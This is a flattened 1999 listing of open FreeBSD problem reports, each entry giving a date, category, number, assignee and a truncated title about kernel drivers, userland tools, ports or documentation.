[1999/02/06] bin/9931 config gives misleading error when duplic o [1999/02/07] ports/9954 ports New port: devel/ACE o [1999/02/08] bin/9972 groff always built for US (letter) sized o [1999/02/09] gnu/9987 jdp wrong (for FreeBSD) ELF_DYNAMIC_INTERPRET o [1999/02/09] bin/9990 Enhancement to filename completeion in cs o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/09] ports/9993 kris New Port - graphics/libunfig o [1999/02/09] ports/9998 kris New port - graphics/mtv (MpegTV player) o [1999/02/10] i386/10004 jkh instalation of current version from FTP s o [1999/02/10] ports/10007 ports Port of the mercury compiler version 0.8 o [1999/02/11] ports/10023 kris New port - net/gtkcookie o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/12] i386/10052 Matrox Millennium II AGP device/model id o [1999/02/14] docs/10085 doc NIS Setup Tutorial o [1999/02/14] kern/10095 missing VGA description o [1999/02/14] docs/10098 doc Lack of overall guide for NIS setup o [1999/02/15] gnu/10112 /usr/src/gnu/usr.bin/patch sorely out of o [1999/02/16] kern/10116 acd driver patch to support PD/CD drive. o [1999/02/16] ports/10124 ports UNIX|STAT pr submission failed to include o [1999/02/18] docs/10146 jkh Release Notes and LINT for 3.1 include ha o [1999/02/18] kern/10149 New PCI device o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10159 Unable to unload vinum module o [1999/02/19] kern/10160 kldload of umap module panics the system o [1999/02/19] ports/10162 se Fix kdmrc to add qmail usernames to NoUse o [1999/02/19] misc/10167 Upon exiting X11R6, monitor goes blank. o [1999/02/20] bin/10169 find -perm doesn't allow a bitwise o [1999/02/20] kern/10175 Bridging support incomplete for some netc o [1999/02/21] ports/10178 torstenb USE_SOCKS=YES option broken for security/ o [1999/02/22] ports/10196 torstenb Better startup scripts for ssh o [1999/02/22] ports/10215 rvb net/coda_client and net/coda_server o [1999/02/23] ports/10227 peter wrong sendmail path in rdist6-port a [1999/02/23] misc/10231 inet_addr() doesn't check for illegal val o [1999/02/25] docs/10240 doc We need a script which check if our web m o [1999/02/25] conf/10244 100 character limit on any pathname in sy o [1999/02/25] kern/10255 Some more SiS chipset PCI IDs for chipset o [1999/02/26] bin/10274 make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/02/28] bin/10300 dmesg exits on signal 10 o [1999/03/01] misc/10325 Implementation of itoa() for libc o [1999/03/01] bin/10342 putenv(3) unnecessarily calls strdup/free o [1999/03/01] misc/10349 For long .Dt fields, rendering is broken- o [1999/03/02] misc/10351 /usr/share/examples/worm is out of date o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames o [1999/03/05] ports/10396 asami SPIN is in the wrong category o [1999/03/06] kern/10440 Discard device does not set ifq_maxlen o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i o [1999/03/06] ports/10454 obrien Update: emulators/spim a [1999/03/06] kern/10455 pcaudio breakage o [1999/03/07] i386/10465 Must disable ex0 to install. o [1999/03/07] ports/10477 ports The fakemail in lib-src fails to link (ne o [1999/03/08] bin/10493 ipfw's undocumented feature o [1999/03/10] bin/10522 make world died due -Werror o [1999/03/10] bin/10524 3.1-19990309-STABLE install problem o [1999/03/10] ports/10532 ports New port: lang/gpc - GNU Pascal o [1999/03/10] bin/10538 sbin/nos-tun gives wrong usage message o [1999/03/11] bin/10546 imp Intel Pro/100 PC card has CIS string > CI o [1999/03/11] bin/10548 More useful default ifconfig behaviour sa o [1999/03/12] gnu/10555 jraynard [PATCH] awk dumps core o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/13] kern/10574 3.1-stable kernel reports k6 cpu as "\^E" o [1999/03/14] conf/10582 Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/14] bin/10590 new option to silince confirmation but no o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10606 Probablue odd error message if LS-120 is o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/16] bin/10622 vi does not display Russian characters pr o [1999/03/16] i386/10623 DFLTPHYS in /usr/src/sys/i386/include/par o [1999/03/16] ports/10634 ports Update the hylafax port to do a client in o [1999/03/17] ports/10639 rse ports/web/wml must be upgraded and unbrok o [1999/03/17] kern/10641 Default sync rate in ncr SCSI driver is s o [1999/03/17] kern/10642 exports(5) mentions KERBNFS but that's no o [1999/03/18] bin/10657 Unable to install from CDROM or DOS parti o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] misc/10667 Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682 asami List mirror sites in MASTER_SITE_BACKUP - o [1999/03/22] kern/10728 sos WCD driver does not recognize a recovered o [1999/03/22] ports/10734 pst Update of gdb port to 4.17 o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/23] i386/10766 obsolete device name wcd is still left un o [1999/03/24] i386/10779 zp slot 0 sees 3Com 589 PCMCIA card but z o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 joe whois(1) client enchancements a [1999/03/26] misc/10804 joe whois(1) enhancement o [1999/03/26] ports/10806 phk Update net/scotty to 2.1.10 o [1999/03/26] kern/10812 LINT configuration MAXDSIZ/DFLDSIZ mislea o [1999/03/26] ports/10813 ports crossgo32 brokeness o [1999/03/27] bin/10825 daily script not executed or executed twi o [1999/03/28] docs/10840 jkh [PATCH] Add pcic double-loading bug fix t f [1999/03/28] ports/10844 ports New port: adagdb o [1999/03/29] docs/10850 doc submitting a documentation change for sed o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/30] misc/10871 wst0 fails with Sony SuperStation streami o [1999/03/30] bin/10878 host(1) dumps core o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/01] bin/10905 sa(8) is hard coded for 8 character user o [1999/04/01] gnu/10910 Integration of Objective C patches into g o [1999/04/02] ports/10916 ports New port: biology/molmol o [1999/04/02] bin/10923 /usr/bin/cpp is an out-of-date wrapper fo o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/04] ports/10945 jmz X11 "sessreg" program does not update /va o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/06] bin/10992 pthread_kill() doesn't deliver signals to o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/07] i386/11006 Sysinstall silently makes FreeBSD's parti o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] ports/11029 ports Configure scripts for non ported applicat o [1999/04/08] bin/11031 [PATCH] mount and umount support for mort o [1999/04/08] bin/11032 h2ph's cpp #warning/#error directive proc o [1999/04/08] ports/11034 ports New port: www/crazywwwboardle o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048 obrien variable not initialized in fwtk-lib lead o [1999/04/09] bin/11051 ps's -U option should accept a list of us o [1999/04/09] misc/11052 [PATCH] performance bug fix to fgets() ro o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/11] bin/11094 lastlogin.8 from NetBSD o [1999/04/12] kern/11109 ipfw.ko Makefile contains CFLAGS+= -DDIVE o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 make(1) does not work as documented with o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/14] ports/11138 jmz New version of Xevil 2.01, I created a po o [1999/04/14] bin/11141 u_long is not big enough o [1999/04/15] misc/11149 Web page entry for BAFUG is incorrect o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 o [1999/04/16] bin/11168 pw(8) usermod does not recognize -w flag o [1999/04/16] kern/11178 [PATCH] minor fix to /usr/include/sys/mbu o [1999/04/18] i386/11201 brian mktime possible bug o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/18] i386/11207 sys/i386/isa/rp.c: fixed breaking and war o [1999/04/19] kern/11222 MFS does not sync from reboot syscall o [1999/04/20] kern/11235 Need to submit new driver o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] conf/11243 mountd startup can lose flags o [1999/04/20] bin/11248 Shuffle o [1999/04/21] docs/11258 doc suggestion to refine npx.4 o [1999/04/22] kern/11287 rfork(RFMEM...) doesn't share LDTs set by o [1999/04/22] misc/11289 makeflp.bat suggestion: create "kernel" d o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/25] misc/11316 [PATCH] HTTP proxy support for sysinstall o [1999/04/27] ports/11353 asami Feature additions to bsd.port.mk. o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/28] bin/11370 more segfaults if you give it a real file o [1999/04/29] misc/11383 $Id$ missing in some files in etc [PATCH] o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] ports/11388 torstenb patch for ircII so /window create works o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11410 code typo in ad1848.c: the != operator ha o [1999/04/30] kern/11411 code typo in clones.c: "if ((mpu_config = o [1999/04/30] kern/11412 code typo in ip_fil.c: missing NULL check o [1999/04/30] kern/11413 code typo in pci.c: the != operator has h o [1999/04/30] kern/11414 code typo in pcf.c: the != operator has h o [1999/04/30] kern/11415 code typo in wst.c: the != operator has h o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/04/30] ports/11421 jfitz upgrade p5-Date-Manip 5.33 -> 5.34 o [1999/05/01] ports/11430 se incorrect int type causes floating point o [1999/05/02] misc/11448 Better looking VGA font for iso2 o [1999/05/02] ports/11460 erich Update to the xlispstat port o [1999/05/03] misc/11478 Non-functional AFS support in KerberosIV o [1999/05/04] ports/11504 chuckr Update ports math/octave o [1999/05/05] ports/11510 nik new version of www/sitecopy (0.6.0) o [1999/05/05] kern/11516 NetGear 10/100 Ethernet 21140-based Ether o [1999/05/05] kern/11517 ../../kern/kern_ntptime.c:533: warning: i o [1999/05/05] kern/11518 ../../pci/if_tx.c:1376: warning: no previ o [1999/05/05] kern/11519 dead code in ncr driver o [1999/05/06] bin/11552 sendmail local delivery (mail.local) can' o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/07] misc/11569 Automatically run fsck when the file syst o [1999/05/09] bin/11608 vnconfig not supporting swap-backed vn de o [1999/05/09] bin/11609 vnconfig -v reports page numbers, not byt s [1999/05/09] ports/11611 billf Update port: net/ntop o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/10] conf/11626 /var/log/kerberos is rotated o [1999/05/10] bin/11637 build of kdump fails o [1999/05/11] ports/11652 ports New port: net/dictd o [1999/05/12] bin/11669 gcc 2.7.2.1 gets bad magic error linking o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/12] i386/11674 can't do make imake build or anything sin o [1999/05/12] kern/11676 PCIless kernel will not compile with ATAP o [1999/05/13] i386/11683 olpt/nlpt name change not in man pages o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] ports/11743 torstenb inn-2.2 (nonfatal) premature stop of buil o [1999/05/17] bin/11746 Add support for Solaris mailboxes o [1999/05/18] kern/11765 performance bug: network devices fxp & de o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] ports/11786 kuriyama gnupg-0.9.6 port does not install o [1999/05/19] misc/11788 booting problems o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/20] misc/11812 ftp5.freebsd.org can't find giflib-3.0 an o [1999/05/21] bin/11818 Added a feature to ping(8) o [1999/05/21] ports/11820 asami bsd.port.subdir.mk does not define the `m o [1999/05/21] i386/11829 Boot Failure (Register Dump) with MFSroot o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/22] ports/11840 asami Feature fixup: bsd.port.mk o [1999/05/24] ports/11879 ports dclock's "-miltime" option and "*miltime" o [1999/05/24] kern/11881 when a dummynet pipe is encountered it st o [1999/05/25] misc/11890 make world creates /lkm directory o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] i386/11898 Connot wirte to floppy on HP OB800CT with o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/27] conf/11905 sysinstall desktop changing inconvenience o [1999/05/28] bin/11914 makewhatis during installworld uses /usr/ o [1999/05/28] i386/11920 FBSD 3.2 upgrade claims not to upgrade /u o [1999/05/28] i386/11921 /usr/X11R6/lib/aout libraries screwed up o [1999/05/29] conf/11925 rc.conf cosmetic naming inconsistencies o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] ports/11963 ports should update the ocaml-tk module and ins o [1999/05/31] ports/11964 jmacd lang/STk port needs to be updated to STk- o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] docs/11978 doc timed(8) manpage does not define '-F' swi o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/01] kern/11981 brian access to tunN devices not allowed to non o [1999/06/01] kern/11982 Three cleanup fixes for uthreads o [1999/06/02] conf/11989 pppd(8) output misplaced s [1999/06/02] bin/11997 Enhancement for lpr o [1999/06/02] ports/12001 ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/03] misc/12013 patch for 12012 o [1999/06/03] kern/12014 Fix SysV Semaphore handling o [1999/06/04] conf/12026 /etc/rc.diskless1 refrences non-existant o [1999/06/05] misc/12044 having tcl.h in /usr/local/include:/usr/i o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor a [1999/06/06] bin/12052 sh type builtin appends first path compon o [1999/06/06] kern/12053 fixes a few aio bugs, makes socket io bet o [1999/06/06] ports/12056 ache [PATCH] hpack install files always in /us o [1999/06/06] ports/12057 markm Perl5 library builds do not honour PREFIX o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/09] kern/12095 [PATCH] Buggy ATAPI Zip Drive is not dete o [1999/06/09] bin/12107 Add switch to dump to support multiple du o [1999/06/10] i386/12113 ESS1688 support for VoxWare sound driver o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/13] ports/12188 ports New port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195 ports New port: pgpenvelope o [1999/06/14] ports/12204 andy Update port: graphics/EZWGL o [1999/06/15] misc/12228 /etc/security don't search in all the fil o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] kern/12241 jkh Req: GENERIC includes bpf device o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/17] bin/12255 BIND 8.1.2 compilation error in IPv6 capa o [1999/06/17] bin/12263 hoek "more" problems with long filenames f [1999/06/17] misc/12268 n_hibma weekly/catman will not work o [1999/06/18] ports/12271 ports fix pkg_add with error message and add ne o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/20] bin/12308 LPD can't be told not to bind to a TCP po o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 asami Adds refetch functionallity to bsd.port.m o [1999/06/21] i386/12326 wdc flag 0x1000 (LBA addressing) prevents o [1999/06/21] kern/12333 ProAudio Spectrum sound card broken model o [1999/06/21] kern/12334 Some ProAudio SPectrum cards do not do DM o [1999/06/21] kern/12335 if_pn.c lacks bridging support; patch enc o [1999/06/22] conf/12342 /etc/hosts.allow must use numerical IP ad o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only o [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/23] ports/12366 billf finish the port for misc/mprime o [1999/06/23] ports/12368 ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/23] bin/12375 mv(1) cannot inherit the file flags. o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/26] ports/12403 ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406 ports New port for the LAM implementation of th o [1999/06/27] kern/12409 add some more chipset models by NVidia to o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/06/30] bin/12461 it's handy to be able to send syslog mess o [1999/06/30] bin/12467 wollman ac(8) does not accept input from stdin o [1999/07/01] bin/12477 New fortune o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/02] ports/12490 ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492 ports port misc/diction should be moved to text o [1999/07/03] kern/12495 3.1 install fails to detect Toshiba CDROM o [1999/07/03] ports/12503 ports New port: Willows toolkit (developers rel o [1999/07/04] ports/12515 jfitz p5-Apache/scripts/install_httpd needs fix o [1999/07/05] ports/12518 ports New port: ifmail-os-2.14.7 o [1999/07/05] ports/12522 ports New port: cos o [1999/07/05] ports/12523 ports New port: jdbcpool o [1999/07/05] bin/12528 [PATCH] tip's "tipout" child doesn't alwa o [1999/07/06] ports/12530 peter squid22 port with --enable-ipf-transparen o [1999/07/06] ports/12536 ports New port: lang/cu-prolog o [1999/07/06] kern/12543 [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/07] ports/12548 asami New 'fecth-recursive(-list)' targets in p o [1999/07/07] ports/12549 ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571 ports Xfig port doesn't have Ghostscript suppor o [1999/07/11] kern/12594 wollman wrong sysctl descriptions f [1999/07/11] ports/12596 torstenb pidentd is unstable in 3.2 and 4.0 o [1999/07/11] ports/12604 peter New port version: transproxy 1.0 o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr s [1999/07/12] bin/12611 sheldonh /usr/bin/jot crashes with floating point o [1999/07/12] misc/12612 ncurses ash shipped with 3.2-R missing sy o [1999/07/12] ports/12618 ache poor trouble reporting by qpopper's pop_i o [1999/07/13] ports/12624 ports New version of mxv which also works with o [1999/07/13] misc/12633 CMI8330 chip based integrated sound card o [1999/07/15] ports/12654 pst gnats port failes on "make install" o [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/15] ports/12656 ports New port: gnujsp o [1999/07/16] ports/12666 andy New port: kcd-4.7.10 o [1999/07/16] kern/12668 The kernel clock goes slow with PLIP devi o [1999/07/16] ports/12674 nik textproc/docproj port has an invalid depe o [1999/07/16] ports/12675 chuckr [PATCH] textproc/sp port installs config. o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/18] ports/12699 ports New port: gnofin-0.5.10 o [1999/07/18] ports/12700 jmz Errors in mtools.conf file o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] ports/12721 brian Leafnode 1.9.4 has enhancements and bug f o [1999/07/20] ports/12722 ports New port: AT&T's DjVu library for scanned o [1999/07/20] kern/12723 Unnecessary use of magic numbers in F_[SG o [1999/07/20] ports/12725 ache Doing a 'make install' for bash2 gets ins o [1999/07/20] ports/12726 jfitz p5-Pg fixed o [1999/07/21] ports/12737 jfitz regex for checking load avergaes is wrong o [1999/07/21] ports/12739 ports New port: AT&T's DjVu Netscape plug-in o [1999/07/22] ports/12761 wosch sysutils/stat doesn't terminate buffer an o [1999/07/22] kern/12764 luigi Patch for using x11amp with voxware (stol o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. o [1999/07/22] bin/12768 billf Compilation warning for fortune.c o [1999/07/22] kern/12770 mount_msdos causes panic: kmem_malloc(134 o [1999/07/23] misc/12776 Add PAM hooks to rlogind and rshd f [1999/07/23] bin/12782 sheldonh xntpd doesn't handle interface aliases pr o [1999/07/24] ports/12787 obrien port of GNU helloworld o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] kern/12803 obrien patch to make xe driver's noise configura o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/27] kern/12833 Support for TI1225 PCI to CardBus Bridge o [1999/07/27] ports/12835 andy New port: libcgic-1.06 o [1999/07/27] ports/12836 jfitz p5-Apache port mod_perl part is out of da o [1999/07/28] kern/12855 panic:softdep_flushfiles:looping, caused o [1999/07/28] ports/12864 ache update: less-340 a [1999/07/28] bin/12866 sheldonh [PATCH] RFE for /bin/ls to add a -n optio o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/30] ports/12890 obrien nmap seems to break under certain conditi o [1999/07/30] ports/12891 torstenb Please update converters/recode to 3.5 o [1999/07/31] kern/12896 Incorrect CPU model display at boot time o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/07/31] ports/12899 ports New port: wmnet-new o [1999/07/31] ports/12903 ports new ports/database/p5-* o [1999/07/31] ports/12904 taoka new ports/devel/gperf o [1999/08/01] ports/12915 ports Add elm 2.5 to ports o [1999/08/01] ports/12916 wosch Update Checkbot to 1.56 o [1999/08/02] docs/12933 n_hibma sio.4 misses description of 0x0080 flag o [1999/08/02] ports/12934 ache procmail 3.13 port doesn't have "install- o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/03] bin/12942 m4: len(`') returns `' a [1999/08/03] kern/12943 dg fxp driver not completely compatible with o [1999/08/03] bin/12946 top(1) gives incorrect delay default o [1999/08/04] ports/12952 asami make _PORT_USE touch cookies by variable, o [1999/08/04] bin/12957 rpc.rusersd dumps core with signal 11 whe o [1999/08/04] bin/12960 des basename(3) and dirname(3) o [1999/08/04] bin/12962 des basename(3) and dirname(3) part 2 o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp o [1999/08/05] misc/12992 sector size independent patch for msdosfs o [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/05] docs/12994 hoek Update to getopt.3 to agree with style.9 o [1999/08/06] bin/13000 vi core dumped o [1999/08/06] ports/13006 erich update emulators/x48 to 0.4.1d o [1999/08/07] conf/13016 Wrong sendmail.cf file used by mergemaste o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] docs/13034 peter incorrect (old/obsolete) manpage for name o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13070 sheldonh line(1) as required by Unix 98 o [1999/08/11] bin/13071 sheldonh link(1) as required by Unix 98 o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] bin/13074 sheldonh unlink(1) as required by Unix 98 o [1999/08/11] docs/13079 mpp new man page describing timeradd() family o [1999/08/11] kern/13082 dfr Improved support for NE2000 PnP cards o [1999/08/11] misc/13089 sysinstall repeatedly installs a distribu s [1999/08/12] bin/13091 sheldonh [PATCH] pdksh-derived replacement for tes o [1999/08/12] bin/13092 des Fetch doesn't default to the correct http o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] docs/13116 jdp typo in ms(7) o [1999/08/13] misc/13117 CVS repo src/lib/libc_r/uthread incorrect o [1999/08/13] ports/13124 ports New port: LinAlg; request for local hosti o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/13] ports/13129 torstenb Postfix Port Ignores MANPREFIX o [1999/08/14] bin/13143 alfred changing mount flags on a mounted filesys o [1999/08/15] misc/13152 systemwide username too short (currently o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/15] kern/13164 kthread_exit stops, but doesn't release p o [1999/08/15] ports/13167 torstenb [PATCH] security/ssh package keygen fails o [1999/08/15] i386/13171 "config" not quite right for kernel not n o [1999/08/16] ports/13173 andy New port: yiff-0.33 o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/17] ports/13191 andy New port: fire-1.0 o [1999/08/17] ports/13201 ports New port: xmess (X11 emulator for game co o [1999/08/17] kern/13209 IPFILTER_DEFAULT_BLOCK not in /usr/src/sy o [1999/08/17] docs/13211 chris [LIST] Some man pages has references to n o [1999/08/17] kern/13215 ALPS GlidePoint in Sony Z505 not recogniz o [1999/08/18] docs/13218 mpp Many manpages still not conformed mdoc(7) o [1999/08/18] kern/13220 mkdep: compile failed - ../../pci/if_de.c o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/18] bin/13235 mpp allow preprocessing with tbl(1) for nroff o [1999/08/18] conf/13249 sysinstall not installing from a local ft o [1999/08/18] ports/13251 andy New port: founts-11 s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/19] bin/13254 yp_all error messages have wrong text o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/20] ports/13267 andy New port: glasteroids-1.0 o [1999/08/20] misc/13275 inter.phone has old codes for Guatemala o [1999/08/20] bin/13278 rogue: killed by fire corrupts score file o [1999/08/20] misc/13282 partial compliance of dlopen to the Singl o [1999/08/21] ports/13291 andy New port: xap-xwf-0.7.8 o [1999/08/21] bin/13309 Fixes to nos-tun s [1999/08/21] kern/13314 sheldonh can't compile when softupdates + debug. o [1999/08/22] misc/13326 additional timeval interfaces for 512MB o [1999/09/21] ports/13887 taoka New port (fmirror) o [1999/09/22] misc/13895 nonexistent words in /usr/share/dict/web2 o [1999/09/22] ports/13898 obrien New port: misc/dictd o [1999/09/22] conf/13907 dummynet.4 correction, rc addition of s [1999/09/22] bin/13909 sheldonh /etc/security problems: IPFIREWALL and pa o [1999/09/22] docs/13914 doc global(1) manpage does not explain -v opt o [1999/09/23] conf/13916 mpp man outputs footer only page as first pag o [1999/09/23] conf/13918 Termcap entries for VESA modes missing o [1999/09/23] gnu/13921 awk -v var=val coredump o [1999/09/23] kern/13924 sb/snd driver broken under 4.0-19990918-C f [1999/09/24] gnu/13935 ru FreeBSD uses an obsolete version of grep o [1999/09/24] i386/13936 No clear indictaion of how much space to o [1999/09/25] docs/13950 doc webpage idea o [1999/09/25] ports/13952 se update emulators/wine to 990923 (supersed o [1999/09/25] docs/13956 doc commercial vendor: JAV-Associates Consult o [1999/09/25] docs/13957 doc Correction to your website for ZNYX Corp. o [1999/09/25] docs/13959 doc cgi notes o [1999/09/25] docs/13967 doc FreeBSD Related Publications in Korea o [1999/09/25] docs/13970 doc FreeBSD Newbie Newsletter o [1999/09/26] kern/13979 [PATCH] add serial number to IDE HD probe o [1999/09/26] ports/13986 ports New port: sysutils/gnometoaster o [1999/09/26] gnu/13989 SIGWINCH corrupts the display of a multil o [1999/09/27] kern/14006 pas2_pcm.c pcm playback problem, with fix o [1999/09/28] docs/14024 doc Several manpages still mentions hosts.den o [1999/09/29] docs/14035 doc tzfile.h referenced in tzfile(5) doesn't o [1999/09/29] bin/14040 amd has wrong uname data compile in it o [1999/09/30] i386/14048 ``doscmd -r'' doesn't work o [1999/09/30] ports/14052 ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] ports/14070 ports g2c libraries and compatibility for DJGPP o [1999/09/30] i386/14071 FreeBSD 3.3 Installation CD does not boot o [1999/10/01] docs/14074 grog vinum(8) manpage gets warning 2.24.2 o [1999/10/31] kern/14634 Mixer synth & mixer CD seem to be swapped o [1999/10/31] kern/14639 convert proc.p_peers to a queue(3) LIST o [1999/11/01] ports/14643 ports A Chinese/English dictionary o [1999/11/01] ports/14644 ports A Big5-localized & XIM-enabled XEmacs por o [1999/11/01] kern/14646 kern.boottime affected by APM suspend/res o [1999/11/01] bin/14648 markm `make world' now requires -DNOCRYPT in my o [1999/11/01] ports/14652 se update emulators/wine to 991031 (supersed o [1999/11/02] ports/14663 ports aspell-.27.2 port doesn't read dictionari o [1999/11/02] gnu/14664 tar checks for volno-file even if it shou o [1999/11/02] docs/14677 chris listing of (48) utilities in /bin:/sbin:/ o [1999/11/03] docs/14682 doc lprm(1) unaware of lp(1) Environment Vari o [1999/11/03] ports/14686 ports New port: pisces IIB (Category: cad) o [1999/11/03] bin/14697 grog Exploitable buffer overflow in Vinum (Fre o [1999/11/03] ports/14700 mharo libmikmod upgrade o [1999/11/03] ports/14701 ports New Port o [1999/11/04] ports/14705 ports [NEW PORTS] ports of xls2xml converter an o [1999/11/04] misc/14706 jkh sysinstall coredumps o [1999/11/04] conf/14714 Need support for imap4 and pop3 in /etc/p o [1999/11/04] ports/14716 ports This is a port of a Swedish dictionary to o [1999/11/06] ports/14741 ports A summary of the old ispell-language-file o [1999/11/06] ports/14743 ports tcl/e package install hangs sysinstall wi o 